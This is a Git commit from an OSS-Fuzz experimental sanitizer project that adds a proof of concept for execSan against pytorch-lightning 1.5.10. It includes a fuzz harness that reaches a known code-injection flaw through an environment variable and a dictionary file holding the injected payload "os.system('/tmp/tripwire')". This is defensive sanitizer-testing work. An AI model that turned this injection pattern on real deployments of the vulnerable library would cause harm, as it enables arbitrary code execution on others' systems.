diff options
author | Dongge Liu <donggeliu@google.com> | 2022-06-09 14:22:41 +1000 |
---|---|---|
committer | GitHub <noreply@github.com> | 2022-06-09 14:22:41 +1000 |
commit | ddf48c9a74ed548dd26ca65e4ff0f2e959196118 (patch) | |
tree | e21e548aa965cc2d0f789849358b8a92fc0b034e /infra | |
parent | 4734e40832cf71d50c28bf5c329a9503125f6456 (diff) |
A PoC of `execSan` with `pytorch-lightning-1.5.10` (#7827)
* A PoC of `execSan` with `pytorch-lightning-1.5.10`
Diffstat (limited to 'infra')
6 files changed, 141 insertions, 0 deletions
diff --git a/infra/experimental/sanitizers/ExecSan/Makefile b/infra/experimental/sanitizers/ExecSan/Makefile index 079a7614..775fa70f 100644 --- a/infra/experimental/sanitizers/ExecSan/Makefile +++ b/infra/experimental/sanitizers/ExecSan/Makefile @@ -13,5 +13,11 @@ target: target.cpp test: all vuln.dict ./execSan ./target -dict=vuln.dict +pytorch-lightning-1.5.10: + cp execSan.cpp PoEs/pytorch-lightning-1.5.10/; \ + cd PoEs/pytorch-lightning-1.5.10/; \ + docker build . --tag execsan_pytorch-lightning; \ + docker run -t execsan_pytorch-lightning:latest; + clean: rm -f execSan /tmp/tripwire target diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Dockerfile b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Dockerfile new file mode 100644 index 00000000..cdc520f0 --- /dev/null +++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Dockerfile @@ -0,0 +1,32 @@ +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# Build and run the proof of error in pytorch-lightning. + +FROM gcr.io/oss-fuzz-base/base-builder-python + +RUN apt update && \ + apt install -y vim && \ + git clone \ + --depth 1 \ + --branch 1.5.10 \ + https://github.com/PyTorchLightning/pytorch-lightning.git + +COPY ./build.sh $SRC +RUN ./build.sh + +COPY . $SRC +RUN make execSan + +CMD ["make", "run"] diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Makefile b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Makefile new file mode 100644 index 00000000..cc8b5296 --- /dev/null +++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/Makefile @@ -0,0 +1,12 @@ +.POSIX: +CXX = clang++ +CFLAGS = -std=c++17 -Wall -Wextra -O3 -g3 + +execSan: execSan.cpp + $(CXX) $(CFLAGS) -lpthread -o $@ $^ + +run: clean execSan fuzz_pytorch_lightning.py + ./execSan ./fuzz_pytorch_lightning.py -dict=vuln.dict + +clean: + rm -f execSan /tmp/tripwire diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/build.sh b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/build.sh new file mode 100755 index 00000000..1c9b1adb --- /dev/null +++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/build.sh @@ -0,0 +1,25 @@ +#!/bin/bash -eu +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +################################################################################ + +# Build and install project (using current CFLAGS, CXXFLAGS). +cd pytorch-lightning +pip3 install . + +# Build fuzzers in $OUT. +for fuzzer in $(find $SRC -name '*_fuzzer.py'); do + compile_python_fuzzer $fuzzer +done diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/fuzz_pytorch_lightning.py b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/fuzz_pytorch_lightning.py new file mode 100755 index 00000000..7d3147ca --- /dev/null +++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/fuzz_pytorch_lightning.py @@ -0,0 +1,65 @@ +#!/usr/local/bin/python3 +# +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +################################################################################ +"""Exploit pytorch lightning with fuzzer's input as a random env variable. + +This PoC is extended from a report in GitHub Advisory Database: +https://github.com/advisories/GHSA-r5qj-cvf9-p85h +The original report documents an exploit using a specific environment variable, +we show a way to achieve the same exploit with an arbitrary env variable. +""" + +import os +import sys +import atheris + +with atheris.instrument_imports(): + from pytorch_lightning import Trainer + from pytorch_lightning.utilities.argparse import parse_env_variables + + +def prepare_fuzzing_input(data): + """Prepare the data needed by the exploit with input data from fuzzers.""" + data = data.replace(b'\0', b'') + env_name = 'AN_ARBITRARY_ENV_NAME' + return data, env_name + + +def exploit_target(env_value, env_name): + """This target is based on a snippet from the official documentation of + `parse_env_variables`: + https://pytorch-lightning.readthedocs.io/en/stable/api/pytorch_lightning.utilities.argparse.html # pylint: disable=line-too-long + It might not be the most realistic example, + but serves as a PoC to show that execSan works for Python.""" + os.environb[env_name.encode()] = env_value + parse_env_variables(Trainer, template=env_name) + + +def TestOneInput(data): # pylint: disable=invalid-name + """Exploit the target only with input data from fuzzers.""" + env_value, env_name = prepare_fuzzing_input(data) + exploit_target(env_value, env_name) + + +def main(): + """Fuzz target with atheris.""" + atheris.Setup(sys.argv, TestOneInput) + atheris.Fuzz() + + +if __name__ == '__main__': + main() diff --git a/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/vuln.dict b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/vuln.dict new file mode 100644 index 00000000..0d19aa40 --- /dev/null +++ b/infra/experimental/sanitizers/ExecSan/PoEs/pytorch-lightning-1.5.10/vuln.dict @@ -0,0 +1 @@ +"os.system('/tmp/tripwire')" |